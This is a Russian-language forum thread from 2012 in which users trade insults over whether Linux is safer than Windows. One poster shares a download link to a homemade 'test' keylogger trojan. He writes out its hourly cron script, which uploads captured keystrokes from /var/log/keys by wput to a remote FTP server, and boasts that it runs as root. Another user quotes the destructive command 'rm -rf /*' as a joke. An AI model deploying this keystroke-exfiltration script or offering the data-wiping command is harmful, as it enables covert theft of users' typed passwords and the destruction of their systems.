Обнаружен первый в истории троянец для Linux.

selenscy · 14-09-12 16:05:05

usual_user пишет:

Мои шлет?

Не, ну не сейчас жэ smile Я же тэщщу!!!

usual_user · 14-09-12 16:06:35

UPS пишет:

Только вы учтите,что у нас с ними борются активно и успешно-это раз.

Я б учел что, кол-во желающих и способных писать вирус под ос прямо пропорционально числу его пользователей. tongue

UPS · 14-09-12 16:07:51

ikkunan salvataja пишет:

Ты это, не отвлекайся, а давай придумывай. Как придумаешь нам покажешь. Ну а мы уж ещё посмеёмся.

Это вы там не отвлекайтесь,по вашей аналогии вирусов в виндовс нет!!!!!!! Давайте мне на проверку,если что сразу скажу-все пипец ,не безопасно однако big_smile

selenscy · 14-09-12 16:09:32

usual_user пишет:

Я б учел что, кол-во желающих и способных писать вирус под ос прямо пропорционально числу его пользователей

Ну дошло ещё хоть до одного! Блять, вы бы мишек пожалели, мало их осталось smile

usual_user · 14-09-12 16:13:35

selenscy пишет:

Ну дошло ещё хоть до одного!

Не, это до тебя дошло, что я это имею ввиду. Но суть от этого не мепняется. Убунту безопаснее. До каких пор будет продолжаться это безобразие big_smile ? Хз. Но пока продолжается, меня все устраивает.

selenscy · 14-09-12 16:32:42

Тут вон про компы с предустановленым поделием всё школота мечтала smile

"Исследователи из Microsoft в ходе контрольной закупки новых компьютеров в Китае обнаружили, что на некоторых их них установлено вредоносное программное обеспечение, говорится в блоге компании.
Было закуплено 20 компьютеров, из них 10 были ноутбуками, а 10 - настольными системами. Покупки совершались в разных городах Китая. Подозрительные программы были найдены на 4 компьютерах.

Вину за установку опасного ПО на машины Microsoft возложила на недобросовестных поставщиков. Сообщается, что на инфицированных компьютерах были установлены нелегальные копии ОС Windows XP или Windows 7.

Один из купленных ноутбуков был заражен вирусом Nitol, который подключал компьютер к одноименному ботнету. Отследив, куда программа обращается за инструкциями, Microsoft смогла вывести из строя центр управления ботнетом.

Закупка компьютеров проводилась в рамках программы Project MARS, которая является инициативой Microsoft. В прошлом Microsoft, действуя совместно с другими компаниями, обезвредила ботнеты Waledac, Rustock и Kelihos." https://www.lenta.ru/news/2012/09/14/nitol/

Хи-хи-хи! Скажите спасибо, что там винда стояла lol lol lol

Редактировался selenscy (14-09-12 16:33:05)

Белая рысь · 14-09-12 16:57:28

Rector пишет:

Только у меня одного ощущение, что присутствующая здесь виндузня живет в альтернативном мире?

Альтернативном луноходному-то? Однозначно.

Rector пишет:

У них нет вирусов и прочей дряни.

Дяденька, не перекладывайте с больной головы на здоровую, это у вас вирусов нет ни в линуксе, ни, как оказалось, в винде. По крайней мере, нам вы их показать не смогли.

Rector пишет:

Они все работают под ограниченной и охуенно тюнингованной учеткой. Ведут аудит системы. На каждый чих системы запускают эвристическую проверку. У них просто всё работает. УМВР.

Ололо, ограниченная учётка по умолчанию, noexec, selinux, chroot, запуск от другого пользователя, iptables!!! Пакет разобрать, провести аудит, просмотреть стартап-скрипты, запуск демона!!!
И это только то, что про Linux прозвучало за 1 день. У кого, говорите, всё то, что перечислено Вами? *лапаморда*

Rector пишет:

Только где вдалеке слышны вопли других виндузятников - Помогите! Я увидел чёрный баннер! *лядь! Опять спиздили почту! Ну козлы! Взомали учотку в контакти!

А здесь слышны вопли линуксоидов: "Блин, ну, когда же они выпустят обновление?" "Этой программы под Linux нету, и под вайн она не работает" "Драйверов для этой железки не делали" "Мне в игрушку поиграть, пойду, перезагружусь в дырявую и глючную винду"
Фэйл.

Rector · 14-09-12 17:34:04

Белая рысь пишет:

Дяденька, не перекладывайте с больной головы на здоровую, это у вас вирусов нет ни в линуксе, ни, как оказалось, в винде.

Да неужели!? Вот, я даже как не программист написал вам (всем) примеры. Легонькие, не большие примеры, как я был имел винду. Даже при этом не зная программирования.

Белая рысь пишет:

Ололо, ограниченная учётка по умолчанию, noexec, selinux, chroot, запуск от другого пользователя, iptables!!!

С удовольствием посмотрим на примеры настройки Вашего дистра, Вами, Как это Вы всё так настроили? Перечисленные Вами утилиты для настройки Linux. Может по Вашему коду другие сделают кнопку "Сделать Заебись!"

Белая рысь · 14-09-12 17:36:49

Rector пишет:

С удовольствием посмотрим на примеры настройки Вашего дистра, Вами, Как это Вы всё так настроили? Перечисленные Вами утилиты для настройки Linux. Может по Вашему коду другие сделают кнопку "Сделать Заебись!"

Я? Окститесь, это Ваши единомышленники тут сказки Венского леса рассказывают. Я вообще махровый виндузятник. Вплоть до того, что отключаю iptables, потому что не знаю, как разрешить входящее подключение.

Rector · 14-09-12 18:04:14

Белая рысь пишет:

Я вообще махровый виндузятник. Вплоть до того, что отключаю iptables, потому что не знаю, как разрешить входящее подключение.

О! Может по netsh мастер--класс покажете?

Добавлено спустя 22 мин 49 с:

UPS пишет:

Давайте мне на проверку,если что сразу скажу-все пипец ,не безопасно однако

Дак качай -) Потом отпишись со скриншотами. Как всё было!? -))

selenscy · 14-09-12 18:37:40

В общем вот вам простейший вариант тестовый вариант трояна кейлоггера с передачей всех нажатых клавиш, по ftp, на прописаный вами удалённый ip, с установленым ftp сервером, составленый всего лишь из ёпенсорцных утилит https://rghost.net/40359458, как и обещал. Только там в файлике /CONTENTS/etc/cron.hourly/cronlwput надо выставить правильный адресок с логином и паролем wink Естественно светить своими айпишниками и пассами я не собираюсь smile

Редактировался selenscy (14-09-12 18:38:07)

Rector · 14-09-12 18:39:52

selenscy, Это не будет работать.

Белая рысь · 14-09-12 18:40:44

Rector пишет:

О! Может по netsh мастер--класс покажете?

Зависит от того, а что, собсно надо... Давайте задачу.

selenscy · 14-09-12 18:41:54

Rector пишет:

selenscy, Это не будет работать.

А чойта? wink У мну работает wink

Уебанта 10.04 32 бита smile

Редактировался selenscy (14-09-12 18:45:09)

Apollo 11 · 14-09-12 18:42:14

Белая рысь пишет:

это у вас вирусов нет ни в линуксе, ни, как оказалось, в винде

А что, таки есть? Ссылочкой не поделитесь?

Белая рысь пишет:

ограниченная учётка по умолчанию, noexec, selinux, chroot, запуск от другого пользователя, iptables!!! У кого, говорите, всё то, что перечислено Вами? *лапаморда*

У меня. Ну, кроме SELinux, который нафиг не нужен на домашней машине. Браузер, например, запускается от другого пользователя, права которого урезаны по самое "не могу" и "хомяк" которого потерять не жалко. А "noexec" — вообще святое дело для "хомяка". Все нужные каталоги и скрипты вынесены на другой раздел, в котором разрешено исполнение. Есть, правда, ещё /tmp, но он очищается при выходе. И его можно (при желании) вообще в ОЗУ смонтировать.
В бубунтах, насколько я знаю, AppArmor по умолчанию. И настройки у него довольно продуманные.

Добавлено спустя 02 мин 42 с:

selenscy пишет:

/etc/cron.hourly

Опять влажные мечты вендузятнега? И каким х*ем ты туда дотянешься без пароля root'а? Будешь искать дыры в sudo?

selenscy · 14-09-12 18:45:58

Apollo 11 пишет:

Опять влажные мечты вендузятнега? И каким х*ем ты туда дотянешься без пароля root'а? Будешь искать дыры в sudo?

ЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫ!!!!

[....пишет из под стола....]

Apollo 11 · 14-09-12 18:48:27

usual_user пишет:

Я б учел что, кол-во желающих и способных писать вирус под ос прямо пропорционально числу его пользователей.

Выходит, что в 2000-2002 годах (да и в 2004-2005, ЕМНИП) под Linux сидело гораздо больше пользователей, чем сейчас? Ну, если говорить о прямых пропорциях вирус/число_пользователей. Парадокс?

Rector · 14-09-12 18:49:04

Белая рысь пишет:

Давайте задачу.

Смените мне, плз...Прокси сервер у юзера.

Apollo 11 · 14-09-12 18:50:26

selenscy пишет:

ЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫ!!!!
[....пишет из под стола....]

Серьёзный аргумент, да.

Белая рысь · 14-09-12 18:53:44

Apollo 11 пишет:

А что, таки есть? Ссылочкой не поделитесь?

Нет-нет, меня всё устраивает, мне и без вирусов хорошо. А за поделиями разной степени глюкавости - в соседнюю ветку, пожалуйста. smile )

Apollo 11 пишет:

У меня. Ну, кроме SELinux, который нафиг не нужен на домашней машине. Браузер, например, запускается от другого пользователя, права которого урезаны по самое "не могу" и "хомяк" которого потерять не жалко. А "noexec" — вообще святое дело для "хомяка". Все нужные каталоги и скрипты вынесены на другой раздел, в котором разрешено исполнение. Есть, правда, ещё /tmp, но он очищается при выходе. И его можно (при желании) вообще в ОЗУ смонтировать.В бубунтах, насколько я знаю, AppArmor по умолчанию. И настройки у него довольно продуманные.

Не, не поймите правильно, я подобный подход всячески одобряю. Просто некоторые тут возмущаются не по делу.

selenscy · 14-09-12 18:57:35

Apollo 11 пишет:

Серьёзный аргумент, да.

Ну так если ты такой тупой швабодный илитный шписиалист ? big_smile Какие ещё могут быть аргументы? lol lol lol

Чо там говорить, берёшь и ставишь wink Хуле, вы же ничо не боитесь cool Проверить можно, посмотрев через часик /var/log/keys wink До кучи можно подправить в /etc/cron.hourly/ файлег cronlwput изменив

#!/bin/sh
#

wput -u --reupload /var/log/keys ftp://login:password@your_adress

exit 0

на ваши значения ftp, чтобы просто убедиться tongue

Удачи в кейлоггировании и приёме логов!!! cool

Редактировался selenscy (14-09-12 19:05:40)

Apollo 11 · 14-09-12 19:05:28

Белая рысь пишет:

Просто некоторые тут возмущаются не по делу.

А-а-а-а, ну это как всегда на СЛОРе.

selenscy пишет:

Чо там говорить, берёшь и ставишь

П-ф-ф-ф-ф-ф... lol И это всё, на что хватило твоего скудного умишка? Даже на /tmp ума не хватило? lol Может, я тебе ещё и сам помочь должен, прописав в консоли:

# rm -rf /*

???? lol Короче, клоун, залезь обратно под свою табуретку, под стол, под диван, или откуда там тебе привычнее нести околесицу, и больше не пытайся делать умный вид. Подобная тупость — это настолько грустно, что уже даже и не смешно. Хацкер, блин! lol

selenscy · 14-09-12 19:07:34

ЫЫЫЫЫЫ!!!!

selenscy пишет:

простейший вариант тестовый вариант

Я уже ссу кипятком на списиалистов!!! lol lol lol Видать работает даже этот примитив cool И насрать ему на илитное мнение швабодного списиалиста

Apollo 11 пишет:

И каким х*ем ты туда дотянешься без пароля root'а? Будешь искать дыры в sudo?

Вместе с рутом lol lol lol Потому как команды в cron.hourly выполняются из под рута tongue

Редактировался selenscy (14-09-12 19:14:49)

Белая рысь · 14-09-12 19:14:04

Rector пишет:

Смените мне, плз...Прокси сервер у юзера.

Прошу прощения, привёл нерабочий пример. Сообщение удалил.

Форум StopLinux

Объявление

#226 14-09-12 16:05:05

Re: Обнаружен первый в истории троянец для Linux.

#227 14-09-12 16:06:35

Re: Обнаружен первый в истории троянец для Linux.

#228 14-09-12 16:07:51

Re: Обнаружен первый в истории троянец для Linux.

#229 14-09-12 16:09:32

Re: Обнаружен первый в истории троянец для Linux.

#230 14-09-12 16:13:35

Re: Обнаружен первый в истории троянец для Linux.

#231 14-09-12 16:32:42

Re: Обнаружен первый в истории троянец для Linux.

#232 14-09-12 16:57:28

Re: Обнаружен первый в истории троянец для Linux.

#233 14-09-12 17:34:04

Re: Обнаружен первый в истории троянец для Linux.

#234 14-09-12 17:36:49

Re: Обнаружен первый в истории троянец для Linux.

#235 14-09-12 18:04:14

Re: Обнаружен первый в истории троянец для Linux.

#236 14-09-12 18:37:40

Re: Обнаружен первый в истории троянец для Linux.

#237 14-09-12 18:39:52

Re: Обнаружен первый в истории троянец для Linux.

#238 14-09-12 18:40:44

Re: Обнаружен первый в истории троянец для Linux.

#239 14-09-12 18:41:54

Re: Обнаружен первый в истории троянец для Linux.

#240 14-09-12 18:42:14

Re: Обнаружен первый в истории троянец для Linux.

#241 14-09-12 18:45:58

Re: Обнаружен первый в истории троянец для Linux.

#242 14-09-12 18:48:27

Re: Обнаружен первый в истории троянец для Linux.

#243 14-09-12 18:49:04

Re: Обнаружен первый в истории троянец для Linux.

#244 14-09-12 18:50:26

Re: Обнаружен первый в истории троянец для Linux.

#245 14-09-12 18:53:44

Re: Обнаружен первый в истории троянец для Linux.

#246 14-09-12 18:57:35

Re: Обнаружен первый в истории троянец для Linux.

#247 14-09-12 19:05:28

Re: Обнаружен первый в истории троянец для Linux.

#248 14-09-12 19:07:34

Re: Обнаружен первый в истории троянец для Linux.

#249 14-09-12 19:14:04

Re: Обнаружен первый в истории троянец для Linux.

Подвал форума